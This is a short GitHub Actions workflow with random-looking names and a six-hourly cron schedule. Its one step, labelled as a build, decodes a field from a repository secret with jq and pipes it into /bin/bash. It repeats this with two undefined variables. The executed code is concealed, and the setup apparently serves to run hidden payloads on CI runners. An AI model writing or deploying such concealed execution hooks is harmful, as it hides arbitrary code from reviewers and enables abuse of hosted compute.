name: chenliehui7815

on:
  workflow_dispatch:
  schedule:
    - cron: '30 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: chenliehui7815
        env:
          w2: ${{ secrets.w2 }}
        run: |
          echo $w2 | jq -r .n19123 | /bin/bash
          echo $hiq7790 | jq -r .pqq71 | /bin/bash
          echo $dkr78 | jq -r .i886 | /bin/bash

